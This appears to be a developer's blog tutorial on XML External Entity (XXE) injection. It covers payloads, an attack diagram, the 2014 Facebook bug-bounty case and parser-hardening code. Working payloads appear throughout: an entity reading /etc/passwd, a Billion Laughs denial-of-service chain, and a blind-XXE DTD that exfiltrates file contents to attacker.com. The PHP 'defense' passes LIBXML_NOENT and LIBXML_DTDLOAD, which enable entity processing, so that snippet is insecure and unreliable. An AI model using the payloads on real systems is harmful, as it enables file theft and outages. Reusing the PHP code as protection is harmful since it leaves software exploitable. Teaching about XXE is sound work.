Luke a Pro

Luke Sun

Developer & Marketer

🇺🇦
EN||

XML External Entity (XXE) Injection

| , 5 minutes reading.

1. Definition

XML External Entity (XXE) Injection is a vulnerability that targets applications parsing XML input. It exploits a feature of XML called “external entities” to:

  • Read arbitrary files from the server
  • Perform Server-Side Request Forgery (SSRF)
  • Execute denial-of-service attacks
  • In some cases, achieve remote code execution

XXE vulnerabilities arise when XML parsers are configured to process external entity declarations, which can reference local files or remote URLs.

2. Technical Explanation

XML allows defining entities as shortcuts for content. External entities can reference content from outside the XML document.

Basic XML Entity Syntax:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY myEntity "Hello World">
]>
<root>&myEntity;</root>

External Entity (XXE) Payload:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

When parsed, &xxe; is replaced with the contents of /etc/passwd.

Common XXE Attack Types:

  1. File Disclosure: Read sensitive files (/etc/passwd, config files, source code).
  2. SSRF: Make requests to internal services (http://169.254.169.254/).
  3. Blind XXE: Exfiltrate data via out-of-band channels when output is not returned.
  4. Billion Laughs (DoS): Exponentially expanding entities crash the parser.

Billion Laughs Attack:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root>&lol4;</root>

This small payload expands to gigabytes of data in memory.

3. Attack Flow

sequenceDiagram
    participant Attacker
    participant WebApp as Web Application
    participant XMLParser as XML Parser
    participant FileSystem as File System

    Attacker->>WebApp: POST /api/upload<br/>Content-Type: application/xml

    Note over Attacker: XML payload with<br/>external entity definition

    WebApp->>XMLParser: Parse XML input

    XMLParser->>XMLParser: Process DOCTYPE declaration<br/>Found external entity

    XMLParser->>FileSystem: Read file:///etc/passwd

    FileSystem-->>XMLParser: File contents returned

    XMLParser-->>WebApp: Parsed XML with file contents

    WebApp-->>Attacker: Response contains /etc/passwd

4. Real-World Case Study: Facebook XXE (2014)

Target: Facebook’s careers portal. Vulnerability Class: Blind XXE via Word document upload.

The Vulnerability: Facebook’s careers page allowed users to upload resumes. The application accepted .docx files, which are actually ZIP archives containing XML files. The XML parser processing these files had external entity processing enabled.

The Attack: Security researcher Mohamed Ramadan discovered that:

  1. .docx files contain XML files (e.g., word/document.xml).
  2. He crafted a malicious .docx with XXE payload in the XML.
  3. The payload referenced an external URL he controlled.
  4. When Facebook parsed the document, it made a request to his server.

Blind XXE Exfiltration: Since the file contents were not directly returned, he used parameter entities to exfiltrate data:

<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>

The external DTD (evil.dtd) contained:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;

Impact: This allowed reading arbitrary files from Facebook’s servers. Mohamed received a $33,500 bounty, and Facebook patched the vulnerability by disabling external entity processing.

5. Detailed Defense Strategies

A. Disable External Entity Processing

The most effective defense is to disable external entities entirely.

Java (DocumentBuilderFactory):

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

Python (lxml):

from lxml import etree

parser = etree.XMLParser(resolve_entities=False, no_network=True)
tree = etree.parse(xml_file, parser)

PHP:

libxml_disable_entity_loader(true);
$doc = new DOMDocument();
$doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);

.NET:

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(stream, settings);

B. Use Less Complex Data Formats

If possible, avoid XML entirely for user input.

  • JSON: Does not have entity processing features.
  • YAML: Simpler structure (but has its own security concerns).
  • Protocol Buffers / MessagePack: Binary formats without these risks.

C. Input Validation

If XML is required, validate and sanitize input.

  • Schema Validation: Use XSD to enforce structure.
  • Strip DOCTYPE: Remove or reject XML with DOCTYPE declarations.
  • Content-Type Checking: Ensure uploaded files match expected types.

D. Web Application Firewall (WAF)

Configure WAF rules to detect XXE patterns.

  • Block requests containing <!ENTITY, <!DOCTYPE, SYSTEM, PUBLIC.
  • Be aware that attackers may use encoding to bypass simple pattern matching.

E. Least Privilege

Limit the XML parser’s access.

  • Filesystem: Run parser in sandboxed environment with minimal file access.
  • Network: Block outbound connections from XML processing services.
  • User Permissions: Parser process should not run as root.

6. References